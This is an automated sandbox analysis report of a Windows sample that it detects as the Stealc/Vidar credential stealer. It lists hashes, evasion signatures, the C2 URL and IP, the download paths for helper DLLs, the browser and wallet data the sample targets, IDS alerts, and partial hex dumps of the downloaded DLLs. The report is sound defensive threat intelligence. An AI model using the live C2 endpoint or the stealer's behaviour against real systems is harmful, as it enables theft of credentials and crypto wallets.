Windows Analysis Report
zUKf62kgkm.exe

Overview

General Information

Sample name: zUKf62kgkm.exe
renamed because original name is a hash value
Original sample name: 90208d9829610c65880196d3e28539b95394639d9b2c6a86c57d6f54d8962e60.exe
Analysis ID: 1599862
MD5: 4dcc556f843a576529c081a6e1c878e2
SHA1: 81844169aee4b15c2ead4b70891ee4a7daf65cf6
SHA256: 90208d9829610c65880196d3e28539b95394639d9b2c6a86c57d6f54d8962e60
Tags: exeStealcuser-Bastian455_
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: zUKf62kgkm.exe Avira: detected
Source: http://185.215.113.206/ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllS Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllg Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll5 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllh Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dlll Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllf Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dlll Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll- Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllf Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllB Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php3I Avira URL Cloud: Label: malware
Source: http://185.215.113.206 Avira URL Cloud: Label: malware
Source: zUKf62kgkm.exe.7116.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "brat"}
Source: zUKf62kgkm.exe Virustotal: Detection: 74% Perma Link
Source: zUKf62kgkm.exe ReversingLabs: Detection: 71%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: zUKf62kgkm.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\zUKf62kgkm.exe Code function: 0_2_6C466C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C466C80
Source: zUKf62kgkm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: zUKf62kgkm.exe, 00000000.00000002.2101456032.000000006C4CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: zUKf62kgkm.exe, 00000000.00000002.2101748953.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: zUKf62kgkm.exe, 00000000.00000002.2101456032.000000006C4CD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\zUKf62kgkm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 9MB later: 40MB

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49731 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49731 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49731 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49731
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49731 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic TCP traffic: 192.168.2.4:56739 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 Jan 2025 15:51:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 